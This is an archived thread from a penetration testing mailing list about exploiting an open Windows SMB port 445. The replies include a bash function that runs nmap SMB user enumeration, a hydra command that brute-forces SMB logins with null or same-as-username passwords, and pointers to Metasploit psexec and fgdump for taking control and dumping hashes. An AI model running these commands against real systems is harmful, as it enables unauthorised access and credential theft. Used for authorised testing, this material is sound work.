Penetration Testing mailing list archives
Exploiting IPC$
From: "Adrian Puente Z." <apuente () hackarandas com>
Date: Tue, 05 Jan 2010 22:48:35 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I recommend the SuperScan4 thar runs on windows. http://www.foundstone.com/us/resources/proddesc/superscan.htm I also use this bash script that runs with Nmap Version 5.00 or later in backrack. function nmapenumsmb { if [ $# -eq 0 ] then echo -e "Sintaxis: nmapenumsmb <IP>" exit 1 fi `which nmap` -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.$1 $1 echo Getting users echo "Login;Type;Domain;RID;Full Name;Description;Flags;Source"
nmap.enum.users.notdisabled.$1.csv
grep -B1 -A6 -e 'Type: User' nmap.enum.$1.nmap | tee nmap.enum.usuarios.$1.txt \ | tr -d '\n' | sed 's/|\ \ [a-zA-Z0-9]/\n&/g;s/^|\ \ //g;s/|\ \ \ \ |_\ /;/g' | grep -v "Account disabled" \ | sed 's/^|\ \ //g;s/|\ \ \ \ |_\ /;/g;s/:\ /;/g' | cut - -d\; -f1,3,5,7,9,11,13,15,17 \ | grep \;User\; | tee -a nmap.enum.users.notdisabled.$1.csv \ | grep -ve '\$' nmap.enum.users.notdisabled.notmachines.$1.csv } You add it to your ~/.bashrc and run it as nmapenumsmb IP and generate some pretty CSV files with the enumeration information. Or just nmap -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.IP IP You can also use Cain from www.toxid.it to make the SID brute force user enumeration. Then I use the hydra to test the users for same or null password . It always works. Then you can use Super Scan to know who's Admin. hydra -w 10 -V -L lst.users.1.per.line -es -o passwods.hydra.txt IP smbnt -m GROUP:Domain.com.mx -m D If you get Admin I recommend Metasploit with the smbpsexec module or fgdump from foofus to get control/hashes of the machine. Have fun On Wed, Dec 30, 2009 at 5:38 AM, Halley Souza <souza.halley () gmail com> wrote:
Try nmap scripts smb-enum-shares and smb-brute, always result =) Halley2009/12/29 Jerome Athias <jerome.athias () free fr>scan/check for administrative shares Admin$ C$ (you can find a ton of tools for this task) then you can try a bruteforce attack https://www.securinfos.info/outils-securite-hacking/ipc$crack.rar THCHydra ... RPC/DCOM sploits Metasploit Framework G00D L\_/CK And Happy New Hacking Y3aR! /JA Le 28/12/2009 12:11, Himanshu Goyal a écrit :Hello, Can somebody share how to exploit port 445. I am doing a VA and found port 445 open. When I try to connect IPC$, it says access denied. Thanks Cheers- Himanshu
- ------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board
Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
- ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification
Review Board
Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org ------------------------------------------------------------------------------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review
Board
Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org ------------------------------------------------------------------------
- -- Adrián Puente Z. [www.hackarandas.com] Donde las ideas se dispersan en bytes... "... ruego a mi orgullo que se acompañe siempre de mi prudencia, y si algún día mi prudencia se echara a volar, que al menos pueda volar junto con mi locura" --Nietzche Huella: FBD6 4C36 2557 C64C 1318 70A8 F561 CB6F 4E40 5AFB http://www.hackarandas.com/apuente_at_hackarandas.com.asc.gz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktEFiMACgkQW2tF/eN2yfaeKgCeO7VBfCiOIBKVNk7s3pkbKB+l KyEAn3rnu6rd1tZTj5LLV6Ap6j8z1crk =mJ0x -----END PGP SIGNATURE----- ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- Re: Exploiting IPC$ Halley Souza (Jan 04)
- <Possible follow-ups>
- Exploiting IPC$ Adrian Puente Z. (Jan 06)